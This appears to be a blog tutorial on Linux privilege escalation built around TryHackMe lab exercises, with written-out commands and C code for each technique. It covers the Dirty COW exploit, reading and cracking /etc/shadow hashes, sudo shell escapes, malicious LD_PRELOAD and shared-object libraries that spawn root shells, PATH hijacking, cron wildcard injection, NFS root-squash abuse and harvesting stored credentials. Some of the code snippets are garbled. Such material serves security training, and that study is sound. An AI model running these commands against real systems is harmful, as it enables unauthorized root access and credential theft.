Linux Privilege Escalation

This blog discusses the basic escalation techniques required to get elevated shells in your bug-bounty or CTF challenges, and also to get a little more closure on some Linux topics and processes…

1. Initial Enumeration.

1.1 Basic Enumeration

uname -a                   # Check kernel version
cat /etc/os-release        # Identify OS version
cat /proc/version          # Additional OS info

1.2 User Enumeration.

• whoami
• id
• sudo -l(Tells what commands that a particular user can run.)

cat /etc/passwd

Using this command, we can see the users in the system

cat /etc/passwd | cut -d : -f 1 (For Much more refined output)

cat /etc/shadow: This command shows the encoded passwords for the respective users on the machine.
cat /etc/group: The /etc/group is a text file which defines the groups to which users belong under the Linux and UNIX operating systems.

history: shows the whole bash history

1.3 Network Enumeration

ip a
ip route
ip neigh : for route tables
netstat -ano

1.4 Password Enumeration

• grep --color=auto -rnw '/' -ie "PASSWORD" --color=always 2> /dev/null
-ie = term what to search
• This cmnd will search for word password anywhere in files and spit it out in red color

locate password | more : locating a file containing name password

find / -name authorized_keys
find / -name id_rsa 2> /dev/nullfind . -type f -exec grep -i -I "PASSWORD" {} /dev/null \;

2. Privilege Escalation – Kernel Exploits

2.1 Dirty Cow Vulnerability

Dirty COW was a vulnerability in the Linux kernel. It allowed processes to write to read-only files. This exploit made use of a race condition that lived inside the kernel functions which handle the copy-on-write (COW) feature of memory mappings.

Code to replicate the vulnerability

For Detailed Explanation:
Dirty Cow Demo (toronto.edu)

Tryhackme

Detection

Linux VM

1. In command prompt type:

/home/user/tools/linux-exploit-suggester/linux-exploit-suggester.sh

2. From the output, notice that the OS is vulnerable to “dirty cow”.

Exploitation

Linux VM

1. In command prompt type:

gcc -pthread /home/user/tools/dirtycow/c0w.c -o c0w

2. In command prompt type: ./c0w

Disclaimer: This part takes 1-2 minutes – Please allow it some time to work.

3. In command prompt type: passwd

4. In command prompt type: id

From here, either copy /tmp/passwd back to /usr/bin/passwd or reset your machine to undo changes made to the passwd binary

2.2 Weak File Permissions

we can have read and write permission to /etc/passwd file, but not to /etc/shadow file.

So, if we come across to any /etc/shadow having read access to regular user then we can use that to get elevated shell or gain password of the administrator/root user

in the above picture we can see that we have read access to /etc/shadow file, so we can do the following

• cat /etc/passwd
and observe all the users, we can see ‘x’, this ‘x’ is a placeholder for password of that particular users

• cat /etc/shadow
in shadow file we can see a long hash, that hash is the encrypted password of that user, so if we somehow decrypt the hash and gain the password of root user we can log in and get root privileges

1. copy all the contents in the /etc/passwd file in to a new file and name it passwd
2. Then again copy all the contents in the /etc/shadow files into a new file(shadow) and delete all the non hash users and only keep the users having hash and name it shadow
3. use the tool named unshadow this will replace the placeholder ‘x’ in passwd file into the hash in the shadow file

(Continuation…)

1. copy the user’s with hash into a new file and save it as creds.txt
2. go to google and type hashcat hash types search what type of encoding has $6$ as the initial characters we can see the mode is 1800
3. go to windows and install hashcat.exe and do the following

• hashcat64.exe -m 1800 creds.txt rockyou.txt -o
-o = optimize
  -m = mode of encoding

The password is “password123”.

Tryhackme

Detection

Linux VM

1. In command prompt type:

ls -la /etc/shadow

2. Note the file permissions

Exploitation

Linux VM

1. In command prompt type: cat /etc/passwd

2. Save the output to a file on your attacker machine

3. In command prompt type: cat /etc/shadow

4. Save the output to a file on your attacker machine

Attacker VM

1. In command prompt type: unshadow <PASSWORD-FILE> <SHADOW-FILE> > unshadowed.txt

Now, you have an unshadowed file.  We already know the password, but you can use your favorite hash cracking tool to crack dem hashes.  For example:

hashcat -m 1800 unshadowed.txt rockyou.txt -O

2.3 Escalation via SSH Keys

• What is an Authorized Key?

So generally SSH has two keys to authorize a user one is public, and the other is private the public key/authorized key is saved in the authorized key folder and the private key is saved in the user end.

• What is id_rsa?

id_rsa is a private key related to SSH

In order to find those authorized and id_rsa keys 👇

• find / -name authorized keys 2> /dev/null
• find / -name id_rsa 2> /dev/null

if somehow we find an id_rsa file in the system then open the file and copy the private key into a file in your Linux and open a new tab in your own Linux terminal and then

• gedit id_rsa
chmod 600 id_rsa
ssh -i id_rsa [email protected] (Ip address of the attackers machine)

Tryhackme

Detection

Linux VM

1. In command prompt type:

find / -name authorized_keys 2> /dev/null

2. In a command prompt type:

find / -name id_rsa 2> /dev/null

3. Note the results.

Exploitation

Linux VM

1. Copy the contents of the discovered id_rsa file to a file on your attacker VM.

Attacker VM

1. In command prompt type: chmod 400 id_rsa

2. In command prompt type: ssh -i id_rsa root@<ip>

You should now have a root shell 🙂

3. Escalation path Sudo.

3.1 Sudo shell escaping

• sudo -l
for instance, this command will show all the commands that a user can run as root.

(GTFOBins) refer to this website on how to use those commands and get privileged access to a system

TryHackMe

Detection

Linux VM

1. In command prompt type: sudo -l

2. From the output, notice the list of programs that can run via sudo.

Exploitation

Linux VM

1. In command prompt type any of the following:

a. sudo find /bin -name nano -exec /bin/sh \;

b. sudo awk ‘BEGIN {system(“/bin/sh”)}’

c. echo “os.execute(‘/bin/sh’)” > shell.nse && sudo nmap –script=shell.nse

d. sudo vim -c ‘!sh’

3.2 Escalation via intended functionality

• sudo apache2 -f /etc/shadow

Sometimes we can’t get the sudo privileges through some commands, in that case try the intended functionality of that command.

For example here, Apache has a file visibility permission, so we tried to see the /etc/shadow file try these type of methods while escalating…

TryHackMe

Detection

Linux VM

1. In command prompt type: sudo -l

2. From the output, notice the list of programs that can run via sudo.

Exploitation

Linux VM

1. In command prompt type:

sudo apache2 -f /etc/shadow

2. From the output, copy the root hash.

Attacker VM

1. Open command prompt and type:

echo ‘[Pasted Root Hash]’ > hash.txt

2. In command prompt type:

john –wordlist=/usr/share/wordlists/nmap.lst hash.txt

3. From the output, notice the cracked credentials.

3.3 Escalation via LD_PRELOAD

What is LD_perload?

The LD_PRELOAD trick is a useful technique to influence the linkage of shared libraries and the resolution of symbols (functions) at runtime. To explain LD_PRELOAD, let’s first discuss a bit about libraries in the Linux system.

In brief, a library is a collection of compiled functions. We can make use of these functions in our programs without rewriting the same functionality. This can be achieved by either including the library code in our program (static library) or by linking dynamically at runtime (shared library).

Using static libraries, we can build standalone programs. On the other hand, programs built with a shared library require runtime linker/loader support. For this reason, before executing a program, all required symbols are loaded and the program is prepared for execution. (What Is the LD_PRELOAD Trick? | Baeldung on Linux)

we are going to make a malicious library to do preload it.
Type the below code and save it as shell.c

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void_init(){
    unsetenv("LD_PRELOAD");
    setgid(0);
    setuid(0);
    system("/bin/bash");
}

First, we will unset our LD_PRELOAD env variable so that it doesn’t fall in a loop trying to search for some file. Then we are setting gid and uid as ‘0’ i.e. setting them as root.
Finally, we are telling the system to run “/bin/bash”.
This “/bin/bash” will be executed first while running the exploit because as we are using a shared library, the contents in it(shared library) will be loaded in to the memory first.

After typing the code in, nano type ctr+x and y
next type the following

• gcc -fPIC -shared -o shell.so shell.c -nostartfiles
fPIC = position independent code, i.e., regardless of where your shell addressing is, this is going to function.
  We are compiling our c code into a shared library.
• ls
To check whether the file is compiled or not…
• sudo LD_PRELOAD=/home/user/shell.so apache2
/home/user/shell.so = (full path of the file)
  apache2 = anything that can run as sudo, type sudo -l and give something from it.
  This is making the malicious library(shell.so) run into the LD_PRELOAD so that “/bin/bash” will be executed before the desired command(apache2).

TryHackMe

Detection

Linux VM

1. In the command prompt type: sudo -l

2. From the output, notice that the LD_PRELOAD environment variable is intact.

Exploitation

1. Open a text editor and type:

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init() {
    unsetenv("LD_PRELOAD");
    setgid(0);
    setuid(0);
    system("/bin/bash");
}

2. Save the file as x.c

3. In command prompt type:

gcc -fPIC -shared -o /tmp/x.so x.c -nostartfiles

4. In the command prompt type:

sudo LD_PRELOAD=/tmp/x.so apache2

5. In command prompt type: id

3.4 CVE-2019–14287 sudo Vulnerability Allows Bypass of User Restrictions

• This vulnerability gives the user /program the authority to execute commands as root, despite having no explicit permission to run as root.
• Exploiting the vulnerability requires the user to have sudo privileges that allow them to run commands with an arbitrary user ID, except root.
• sudo -u#-1 /bin/bash

4. SUID Overview and Escalation.

What is SUID?

SUID, which stands for Set owner User ID. This is a special permission that applies to scripts or applications. If the SUID bit is set, when the command is run, its effective UID becomes that of the owner of the file, instead of the user running it.

The format for SUID would be in the terms of

• rwsr-sr-x 1 root root 30768 Dec 7 2021 /usr/bin/passwd

• in order to find these type of SUID’s we can type the following command
• find / -perm -u=s -type f 2> /dev/null
-perm = permission
  -type = file

4.1 Escalation via shared object injection

• find / -type f -perm -04000 -ls 2> /dev/null

• Here observe the staff /usr/local/bin/suid-so here ‘so’ means shared object, and we are going to run to see what it’s doing in the background.
• strace /usr/local/bin/suid-so 2>&1
strace is a diagnostic, debugging and instructional user space utility for Linux.
  It is used to monitor and tamper with interactions between processes and the Linux kernel, which include system calls, signal deliveries, and changes of process state.
• strace /usr/local/bin/suid-so 2>&1 | grep -i -E "open|access|no such file

• Here we are going to load a malicious exploit in the libalc.so so, when we run /usr/local/bin/suid.so it checks for the “libcalc.so” and our malicious code will be executed.

#include <stdio.h>
#include <stdlib.h>
static void inject() __attribute__((constructor));
void inject() {
    system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p");
}

• We are copying the /bin/bash into /tmp/bash and giving +s permission(SUID perm) and executing the /tmp/bash.
• mkdir /home/user/.config
• gcc -shared -fPIC -o /home/user/.config/libcalc.so
• /usr/local/bin/suid-so

TryHackMe

Detection

Linux VM

1. In command prompt type: find / -type f -perm -04000 -ls 2>/dev/null

2. From the output, make note of all the SUID binaries.

3. In command line type:

strace /usr/local/bin/suid-so 2>&1 | grep -i -E “open|access|no such file”

4. From the output, notice that a .so file is missing from a writable directory.

Exploitation

Linux VM

5. In command prompt type: mkdir /home/user/.config

6. In command prompt type: cd /home/user/.config

7. Open a text editor and type:

#include <stdio.h>
#include <stdlib.h>

static void inject() __attribute__((constructor));

void inject() {
    system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p");
}

8. Save the file as libcalc.c

9. In command prompt type:

gcc -shared -o /home/user/.config/libcalc.so -fPIC /home/user/.config/libcalc.c

10. In command prompt type: /usr/local/bin/suid-so

11. In command prompt type: id

4.2 Escalation via binary symlinks

In order for this vulnerability to work, some conditions have to be meet.

1. Vulnerable version of Nginx server is recommended.
2. The setUID bit must be set on sudo.

• Initially run an exploit suggester tool to check the version of Nginx or type the following command dpkg -l | grep nginx

• Now run this line to check the SUID ‘ on the machine. find / -type f -perm -04000 -ls 2>/dev/null

As the both conditions are satisfied, we can look into the log files of the Nginx to check the permissions

• ls -la /var/log/nginx

We can see that www-data has read write execute permission. So by using symlink, we can replace the log files with a malicious file.

What is Symlink?
A symlink is a symbolic link is a file that contains a reference to another file or directory in the form of an absolute or relative path. We are going to create a malicious symlink, and it will be held to the error.log file.

• The only condition here is we have to manually restart the Nginx server to get the elevated shell.

Nginx-Exploit-Deb-Root-PrivEsc-CVE-2016–1247 (legalhackers.com)

• Download the script from the above site and do the following ./nginx-root.sh /var/log/nginx/error.log
We run nginx-root.sh, and we run it and point it to the log file using the command
• It has created the symlink and all we need to do is restart the server, and we will get prompted into elevated shell (the reason to restart is only to demonstrate the lab)
• To restart the Nginx server type, invoke-rc.d nginx rotate > /dev/null 2>&1

TryHackMe

Detection

Linux VM

1. In command prompt type: dpkg -l | grep nginx

2. From the output, notice that the installed nginx version is below 1.6.2-5+deb8u3.

Exploitation

Linux VM – Terminal 1

1. For this exploit, it is required that the user be www-data. To simulate this escalate to root by typing: su root

2. The root password is password123

3. Once escalated to root, in command prompt type: su -l www-data

4. In command prompt type: /home/user/tools/nginx/nginxed-root.sh /var/log/nginx/error.log

5. At this stage, the system waits for logrotate to execute. In order to speed up the process, this will be simulated by connecting to the Linux VM via a different terminal.

Linux VM – Terminal 2

1. Once logged in, type: su root

2. The root password is password123

3. As root, type the following: invoke-rc.d nginx rotate >/dev/null 2>&1

4. Switch back to the previous terminal.

Linux VM – Terminal 1

1. From the output, notice that the exploit continued its execution.

2. In command prompt type: id

4.3 Escalation via Environmental Variables

what is an Environmental Variable?
An environment variable is a variable whose value is set outside the program, typically through functionality built into the operating system or microservice.

To know the environmental variables in your system run env

• find / -type f -perm -4000 -ls 2>/dev/null

• The highlighted ones are specially made to demonstrate this exploit.
• We will run the strings /usr/local/bin/suid-env this will give the contents of the binary

• in the last line we can see the “service apache2 start”. It is using the service command and starting the Apache server .
• Let’s see the PATH of the env by typing print $PATH

• The path is /usr/local/bin
• what is happening here is… With the help of this predefined path(/usr/local/bin), it is asking where is the service? And once it finds, it executes because of the path. The environmental variable is set to this path and that is how we the service command is called.
• What if we change the path to something that we control and write a malicious file named service and get the root shell??
• C one-liner echo 'int main(){ setgid(0); setuid(0); system("/bin/bash");return 0:}' > tmp/service.c

• compile the above code gcc /tmp/service.c -o /tmp/service

• We now have the malicious service sitting in tmp/
  We now need to change our path which is the environmental variable. To do this, we do: export PATH=/tmp:$PATH
• Now if we print PATH we can see it shows /tmp first.

• We now run /usr/local/bin/suid-env. We get the root shell.

4.3.1 SUID (Environment Variables #1)

Detection

Linux VM

1. In command prompt type: find / -type f -perm -04000 -ls 2>/dev/null

2. From the output, make note of all the SUID binaries.

3. In command prompt type: strings /usr/local/bin/suid-env

4. From the output, notice the functions used by the binary.

Exploitation

Linux VM

1. In command prompt type:

echo ‘int main() { setgid(0); setuid(0); system(“/bin/bash”); return 0; }’ > /tmp/service.c

2. In command prompt type: gcc /tmp/service.c -o /tmp/service

3. In command prompt type: export PATH=/tmp:$PATH

4. In command prompt type: /usr/local/bin/suid-env

5. In command prompt type: id

4.3.2 SUID (Environment Variables #2)

Detection

Linux VM

1. In command prompt type: find / -type f -perm -04000 -ls 2>/dev/null

2. From the output, make note of all the SUID binaries.

3. In command prompt type: strings /usr/local/bin/suid-env2

4. From the output, notice the functions used by the binary.

Exploitation Method #1

Linux VM

1. In command prompt type:

function /usr/sbin/service() { cp /bin/bash /tmp && chmod +s /tmp/bash && /tmp/bash -p; }

2. In command prompt type:

export -f /usr/sbin/service

3. In command prompt type: /usr/local/bin/suid-env2

Exploitation Method #2

Linux VM

1. In command prompt type:

env -i SHELLOPTS=xtrace PS4=’$(cp /bin/bash /tmp && chown root.root /tmp/bash && chmod +s /tmp/bash)’ /bin/sh -c ‘/usr/local/bin/suid-env2; set +x; /tmp/bash -p’

5. Capabilities.

• Capabilities are more secure than suid’s, so they are being used in modern kernel(kernal2.0).
• Command to check the capabilities in our system is getcap -r /2>dev/null

• u will see something running as a capabiliy & having a “+ep” at last, let’s assume it to permit everything for our understanding purpose
• /usr/bin/python2.6 -c 'import os; os.setuid(0); os.system("/bin/bash")' by executing this, we will get elevated shell.

TryHackMe

Detection

Linux VM

1. In command prompt type: getcap -r / 2>/dev/null

2. From the output, notice the value of the “cap_setuid” capability.

Exploitation

Linux VM

1. In command prompt type:

/usr/bin/python2.6 -c ‘import os; os.setuid(0); os.system(“/bin/bash”)’

2. Enjoy root!

6. Escalation via Path Scheduled tasks.

Usually works with Cron jobs and systemctl

1. what is a cronjob?
   Cron Jobs are used for scheduling tasks by executing commands at specific dates and times on the server. They’re most commonly used for sysadmin jobs such as backups or cleaning /tmp/ directories and so on.

• To check about what cronjob is running in our machine type cat /etc/cronjob'

• here in the above o/p we can see that there is path(left→ right) and see the overwrite.sh
• and here try going to ls -la /home/user u can’t find the overwrite.sh file so why not created a malicious file and execute it to get elevated shell
• echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/user/overwrite.sh
• chmod +x /home/user/overwrite.sh
• wait for a minute and run /tmp/bash -p we will get elevated shell.

TryHackMe

Detection

Linux VM

1. In command prompt type: cat /etc/crontab

2. From the output, notice the value of the “PATH” variable.

Exploitation

Linux VM

1. In command prompt type:

echo ‘cp /bin/bash /tmp/bash; chmod +s /tmp/bash’ > /home/user/overwrite.sh

2. In command prompt type: chmod +x /home/user/overwrite.sh

3. Wait 1 minute for the Bash script to execute.

4. In command prompt type: /tmp/bash -p

5. In command prompt type: id

6.2 Escalation via cron wildcards

• observe the output from the above first command.

• here we can see the /usr/local/bin/compress.sh
• cat /usr/local/bin/compress.sh

#!/bin/sh
cd /home/user
tar czf /tmp/backup.tar.gz *

it’s running a tar command, and it’s backing up something from and having a wildcard(*) bcs there is a wildcard we can inject a malicious

• echo ‘cp /bin/bash /tmp/bash; chmod +s /tmp/bash’ > runme.sh
• chmod +x runme.sh
• touch /home/user — checkpoint=1
• touch /home/user/ — checkpoint-action=exec=sh\runme.sh
• we are going to upload the runme.sh file into the wildcard(*) and in the first touch command we are going to give the checkpoint as 1 i.e. show me progress report for every 1 number
• and the second touch CMD will do a certain checkpoint-action that is execute the shell runme.sh
• /tmp/bash -p

to sum it up… we are saying when we run this command tar czf /tmp/backup.tar.gz execute this(— checkpoint=1) and this(— checkpoint-action=exec=sh\runme.sh)
it’s going back and saying run this cp /bin/bash /tmp/bash; chmod +s /tmp/bash

TryHackMe

Detection

Linux VM

1. In command prompt type: cat /etc/crontab

2. From the output, notice the script “/usr/local/bin/compress.sh”

3. In command prompt type: cat /usr/local/bin/compress.sh

4. From the output, notice the wildcard (*) used by ‘tar’.

Exploitation

Linux VM

1. In command prompt type:

echo ‘cp /bin/bash /tmp/bash; chmod +s /tmp/bash’ > /home/user/runme.sh

2. touch /home/user/–checkpoint=1

3. touch /home/user/–checkpoint-action=exec=sh\ runme.sh

4. Wait 1 minute for the Bash script to execute.

5. In command prompt type: /tmp/bash -p

6. In command prompt type: id

6.3 Escalation via Cron File Overwrite

Detection

Linux VM

1. In command prompt type: cat /etc/crontab

2. From the output, notice the script “overwrite.sh”

3. In command prompt type: ls -l /usr/local/bin/overwrite.sh

4. From the output, notice the file permissions.

Exploitation

Linux VM

1. In command prompt type:

echo ‘cp /bin/bash /tmp/bash; chmod +s /tmp/bash’ >> /usr/local/bin/overwrite.sh

2. Wait 1 minute for the Bash script to execute.

3. In command prompt type: /tmp/bash -p

4. In command prompt type: id

7. Escalation Path NFS Root Squashing.

• Root squash means squashing the root user or restricting the user in remote access
• no root squash means we have full privileges in a remote access environment
• cat /etc/exports

• we can see a temp folder having “no_root_squash” i.e this folder is shareable and mountable

In a new tab >>

• showmount -e <attcakersIp> (Shows the mountable files in this example we have /tmp*)
• mkdir /tmp/mountme
• mount -o rw,vers=2 attackersIp:/tmp /tmp/mountme
  we are just mounting the attackers file into our own file and giving it read write access
• echo ‘int main() { setgid(0); setuid(0); system(“/bin/bash”); return 0;}’ > /tmp/mountme/x.c
• gcc /tmp/mountme/x.c -o /tmp/mountme
• chmod +s /tmp/mountme/x

In Attackers machine >>

• cd /tmp
• ./x

8. Others

8.1 Stored Passwords (Config Files)

Exploitation

Linux VM

1. In command prompt type: cat /home/user/myvpn.ovpn

2. From the output, make note of the value of the “auth-user-pass” directive.

3. In command prompt type: cat /etc/openvpn/auth.txt

4. From the output, make note of the clear-text credentials.

5. In command prompt type: cat /home/user/.irssi/config | grep -i passw

6. From the output, make note of the clear-text credentials.

8.2 Stored Passwords (History)

Exploitation

Linux VM

1. In command prompt type: cat ~/.bash_history | grep -i passw

2. From the output, make note of the clear-text credentials.